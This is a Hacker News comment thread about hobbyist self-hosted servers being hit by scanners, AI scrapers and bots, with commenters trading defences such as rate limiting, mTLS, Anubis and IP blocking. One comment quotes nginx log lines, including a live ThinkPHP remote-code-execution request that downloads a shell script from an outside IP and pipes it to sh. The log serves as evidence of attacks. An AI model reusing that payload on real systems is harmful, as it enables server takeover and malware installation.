back
199 comments
> The internet is no longer a safe haven for software hobbyists

Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss of some organization and (I'm assuming) they hire some bad actor to try to make you offline.

Dealing with crawlers, bot nets, automation gone wrong, pissed of humans and so on have been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across wide range of providers, and seems to happen across all of them.

My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection & someone turned my site into spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.

I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.

If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.

I have a personal domain that I have no reason to believe any other human visits. I selfhost a few services that only I use but that I expose to the internet so I can access them from anywhere conveniently and without having to expose my home network. Still I get a constant torrent of malicious traffic, just bots trying to exploit known vulnerabilities (loads of them are clearly targeting WordPress, for example, even though I have never used WordPress). And it has been that way for years. I remember the first time I read my access logs I had a heart attack, but it's just the way it is.
My first ever deployed project was breached on day 1 with my database dropped and a ransom note in there. Was a beginner mistake by me that allowed this, but it's pretty discouraging. Its not the internet that sucks, its people that suck.
I can confirm.

My then PageRank 6 Business Website got attacked non stop starting around the 2008.

At this time my log files exploded as well: the Script Kiddies entered the arena.

At the time the first tools leaked into the public to scan for IP ranges and check websites for certain attack vectors.

I miss the era between Compuserve, AOL around 1995 till 2008.

Web Rings, Technorati, fantastic Fan Sites before Wikipedia - wholesome.

Term: Script Kiddies https://en.wikipedia.org/wiki/Script_kiddie

"Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs")."

I have accessed websites that do not use ICANN DNS nor TLS, sometimes on ports other than common ones like 80, 443, etc.

The term "website" to me means an IP address from which an operator publishes hypertext (HTML) and responds to HTTP requests

But others might define "website" differently

On home network for experimentation I create own TLDs in custom root.zone and use non-TLS per packet encryption to serve HTML over UDP instead of TCP

The blog post refers to "safe haven"

Usually "safe haven" means there is something that one is seeking protection from

It is not clear from the blog post what the author believes "the internet" was previously a safe haven from

Not to mention the www != the internet

It's possible the broader internet, including many "unused" ports between 0-65536, could be a "safe haven" from the web what with "AI bots"

Yeah, was it ever safe or is this nostalgia? The few times I've managed servers directly I'd get hit a few hundred times per day in a number of obvious, non-existent URLs or existing URLs but with invalid payloads. Using Cloudflare to block entire countries helped a little bit.
To entertain the few humans behind this, I run what I call "HTTP Adventure" on well-known admin addresses.

E.g., https://www.masswerk.at/wp-admin

> my servers have always been attacked

I believe the correct verb is monetised.

I have very similar experience. In my Nginx logs, I see things like that on a regular basis:

79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ... 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-" 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"

or:

"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"

These are just some examples, but they happen pretty much daily :(

I have been using zipbombs and they were effective to some extent. Then I had the smart idea to write about it on HN [0]. The result was a flood of new types of bots that overwhelmed my $6 server. For ~100k daily request, it wasn't sustainable to serve 1 to 10MB payloads.

I've updated my heuristic to only serve the worst offenders, and created honeypots to collect ips and repond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.

[0]: https://news.ycombinator.com/item?id=43826798

Scrapers have constantly been running against my cgit server for the past year, but they're bizarrely polite in my case... 2-3 requests per minute.

This whole enterprise is clearly run by exceptionally dumb people, since you can just clone all the code I host there directly from upstreams...

    [16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/linux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
    [16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linux/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
    [16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/linux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
    [16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/linux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
    [16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/linux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173fa619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250ms
Anubis is definitely playing the cat-and-mouse game to some extent, but I like what it does because it forces bots to either identify themselves as such or face challenges.

That said, we can likely do better. Cloudflare does good in part because Cloudflare runs so much traffic, so they have a lot of data across the internet. Smaller operators just don't get enough traffic to really deal with banning abusive IPs without banning entire ranges indefinitely, not ideal. I hope to see a solution like Crowdsec where reputation data can be crowdsourced to block known bad bots (at least for a while since they are likely borrowing IPs) while using low complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask for Anubis upstream which is probably already too busy dealing with the challenges of what it already does at the scale it is operating, but it does leave some room for further innovation for whoever wants to go for it.

In my opinion there is at least no reason why it is not plausible to have a drop-in solution that can mostly resolve these problems and make it easier for hobbyists to run services again.

    > Fail2ban was struggling to keep up: it ingests the Nginx access.log file to apply its rules but if the files keep on exploding…
    > [...]
    > But I don’t want to fiddle with even more moving components and configuration
You can configure nginx to do rate-limiting directly. Blog post with more details: https://blog.nginx.org/blog/rate-limiting-nginx
I do not have a solution for blog like this but if you are self hosting I recommend enabling mTLS on your reverse proxy.

I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if user does not present a certificate. My devices which can present cert can connect seamlessly. It's a one time setup but once done you can forget about it.

Since I moved my DNS records to Cloudflare (that is: nameserver is now the one from Cloudflare), I get tons of odd connections, most notably SYN packets to eihter 443 or 22, which never respond back after the SYN-ACK. They ping me once a second in average, distributing the IPs over a /24 network.

I really don't understand why they do this, and it's mostly some shady origins, like vps game server hoster from Brazil and so on.

I'm at the point where i capture all the traffic and looks for SYN packets, check the RDAP records for them to decide if I then drop the entire subnets of that organization, whitelisting things like Google.

Digital Ocean is notoriously a source of bad traffic, they just don't care at all.

My Gitea instance also encountered aggressive scraping some days ago, but with highly distributed IP & ASN & geolocation, each of which is well below the rate of a human visitor. I assume Anubis will not stop the massively funded AI companies, so I'm considering poisoning the scrapers with garbage code, only targeting blind scrapers, of course.
Everything good enough to become popular gets swarmed by the teeming masses and then exploited and destroyed.

The only solution seems to be to constantly abandon those things and move on to new frontiers to enjoy until the cycle repeats.

Upvoted not because the internet has ever been a safe haven, but for simply taking a moment to document the issue. But then again, I can't even give away a feed of what's bouncing off of my walls, drowning in my moat.

(An Alibaba /16? I block not just 3/8, but every AWS range I can find.)

If anyone wants the 2000s internet experience for a while, I recommend deploying a website on IPv6-only server.

It will be accessible to only about 50% of the internet, but back then not many people had internet anyway.

I wonder if you can have a chain of "invisible" links on your site that a normal person wouldn't see or click. The links can go page A -> page B -> page C, where a request for C = instant IP ban.
The problem with anything, anything, without a centralized authority, is that friction overwhelms inertia. Bad actors exist and have no mercy, while good people downplay them until it’s too late. Entropy always wins. Misguided people assume the problem is powerful people, when the problem is actually what the powerful people use their authority to do, as powerful people will always exist. Accepting that and maintaining oversight is the historically successful norm; abolishing them has always failed.

As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.

I wonder if a proof of work protocol is a viable solution. To GET the page, you have to spend enough electricity to solve a puzzle. The question is whether the threshold could be low enough for typical people on their phones to access the site easily, but high enough that mass scraping is significantly reduced.
When ever was the internet a safe haven, from what exactly?
I don't know if there's a simple solution to deploy this but JA3 fingerprinting is sometimes used to identify similar clients even if they're spread across IPs: https://engineering.salesforce.com/tls-fingerprinting-with-j...
I wonder how much of the world's compute/electricity is wasted in malicious bots.
> Other things I’ve noticed is increased traffic with Referer headers coming from strange websites such as bioware.com, mcdonalds.com, and microsoft.com

I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?

Unpopular opinion: the real source of the problem is not scrapers, but your unoptimized web software. Gitea and Fail2ban are resource hogs in your case, either unoptimized or poorly configured.

My tiny personal web servers can whistand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.

"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.

I wonder why is it that we get an increase in these automated scrapers and attacks as of late (some few years); is there better (open-source?) technology that allows it? Is it because hosting infrastructure is cheaper also for the attackers? Both? Something else?

Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.

The Internet has really been an interesting case study for what happens between people when you remove a varying number of layers of social control.

All the way back to the early days of Usenet really.

I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.

I have a question about this part:

> moving the entire hosting to CloudFlare that will do it for me ... nor do I want to route my visitors through tracking-enabled USA servers

Isn't there some EU equivalent to CloudFlare he can use?

It's hard to admit, but DDoS mitigation is an essential part of having even a simple website these days.

A simple captcha would be to just make the user move their mouse or finger to 2 or 3 dots in a square.

Shouldn’t take more than a second to perform the motions as a website visitor..

If the movement is suspiciously smooth, or isn’t accelerated and decelerated as a human hand would, it’s a bot - or an agentic browser.

The reason we can't just block ranges is because CGNAT means that we wind up having to block entire providers instead of the individual with the compromised machine.

IPv6 would solve this and we get the end-to-end nature of the internet back. So everybody will start screaming for IPv6 when?

sad but hosting static content like his site in a cloud would save him a headache. i know i know, "do it yourself" and all but if that is his path he knows the price. maybe i am wrong and do not understand the problem but it seems like he is asking for a headache.

edit: words

I run a dedicated firewall/dns box with netfilter rules to rate limit new connections per IP. It looks like I may need to change that to rate limit per /16 subnet...
While not particularly helpful for multi-user instances, I’ve had good enough luck putting my Gitea server behind a Unifi gateway and accessing the admin via Teleport.
Isn’t this problem why Cloudflare is popular? You can write your own server, but outsource protecting it from bots.

Perhaps there are better alternatives?

I wonder how much scraper effort is being spent talking to Samsung refrigerators and such.
The Internet was a scene, and like all scenes it's done now the corpos have moved in and taken over (because at that point it's just ads and rent extraction in perpetuity). I dunno what/where/when the next tech scene will be, but I do know it's not going to come from Big Tech. See: Metaverse.
I very much relate to the author's sour mood and frustration. I also host a small hobby forum and have experienced the same attacks constantly, and it has gotten especially bad the last couple of years with the rise of AI.

In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".

While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?

Last year, in a fit of desperation, I added Cloudflare. This has a brute force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. It is great UX? No, but at least the site isn't getting hammered by various locations in Asia. Cloudflare also let me block entire countries, although that seems to be easily fooled.

I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.

There need to be some hard and fast rules put in place, somehow, to stop the madness.

internet "safe heaven" is polarized on multiple walled garden like small forum,channel discord,niche app etc

basically small traffic site where moderations and rules is can be enforced

Some HNers already mentioned that the internet has not been a safe haven for a long time. All these vulnerability scanners and parsers were pinging my localhost servers even in mid 2k. It has just become worse, and even OSS and usually captcha-free places are installing things like Anubis [1].

All of this reminds me of some of Gibson's short stories I read recently and his description of Cyberspace: small corporate islands of protected networks in a hostile sea of sapient AIs ready to burn your brain.

Luckily, LLMs are not there yet, except you can still get your brain burnt from AI slop or polarizing short videos.

[1] - https://anubis.techaro.lol/

Had to ban RU, CN, SG, and KR just cos of the volume of spam. The random referer headers has recently become a problem.

This is particularly annoying as knowing where people come from is important.

Its just another reason to give up making stuff, and give in to the FAANG and the AI enshittification.

:-(

It's probably just time for the web page to die
the internet is over. If we want to recapture the magic of the earlier times we are going to have to invent something new.
Yet another story demonstrating why you should not run fail2ban